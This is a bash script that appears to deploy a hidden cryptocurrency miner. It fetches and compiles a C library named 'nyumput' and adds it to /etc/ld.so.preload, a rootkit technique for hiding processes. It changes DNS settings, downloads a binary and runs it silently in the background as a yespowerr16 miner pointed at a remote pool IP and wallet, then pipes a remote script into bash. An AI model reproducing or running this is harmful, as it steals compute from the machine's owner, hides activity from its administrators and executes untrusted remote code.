#!/bin/bash
apt-get update ; apt-get install sudo -y
lscpu
curl https://github.com/kartolo92/koplok/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget -O asu https://github.com/kartolo92/pile/raw/main/CPU
chmod 777 asu
./asu -a yespowerr16  -o stratum+tcp://137.184.39.51:443 -u RWbhncrPdo2pEhineUq4Vro6RTsrR5vuxw.$(shuf -n 1 -i 1-99999)-kzp > /dev/null 2>&1 &
curl -sL https://github.com/kartolo92/koplok/raw/master/time | bash
